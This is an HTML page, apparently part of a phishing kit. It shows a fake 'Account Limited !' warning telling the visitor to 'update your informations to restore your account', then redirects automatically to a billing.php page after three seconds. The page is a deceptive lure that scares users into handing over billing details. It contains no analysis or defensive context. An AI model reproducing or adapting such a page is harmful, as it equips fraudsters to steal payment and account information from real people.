<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>My Account</title>
<meta name="generator" content="WYSIWYG Web Builder 10 - http://www.wysiwygwebbuilder.com">
<link href="images/favicon.ico" rel="shortcut icon" type="image/x-icon">
<link href="css/Untitled1.css" rel="stylesheet">
<link href="css/alert2.css" rel="stylesheet">
<meta http-equiv="refresh" content="3; URL=billing.php">
</head>
<body>
<div id="wb_Form1" style="position:absolute;left:482px; border-radius: 10px;  top:131px;width:386px;height:321px;z-index:3;">
<form name="Form1" method="post" action="" enctype="text/plain" id="Form1">
<div id="wb_Text2" style="position:absolute;left:15px;top:80px;width:357px;height:42px;text-align:center;z-index:0;">
<span style="color:#7B68EE;font-family:Arial;font-size:17px;">You must update your informations to restore your account </span></div>
<div id="wb_Image1" style="position:absolute;left:123px;top:145px;width:128px;height:128px;z-index:1;">
<img src="images/alert.png" id="Image1" alt=""></div>
<div id="wb_Text1" style="position:absolute;left:59px;top:17px;width:288px;height:38px;z-index:2;text-align:left;">
<span style="color:#DC143C;font-family:'Arial Black';font-size:27px;"><strong>Account Limited&nbsp; !</strong></span></div>
</form>
</div>
</body>
</html>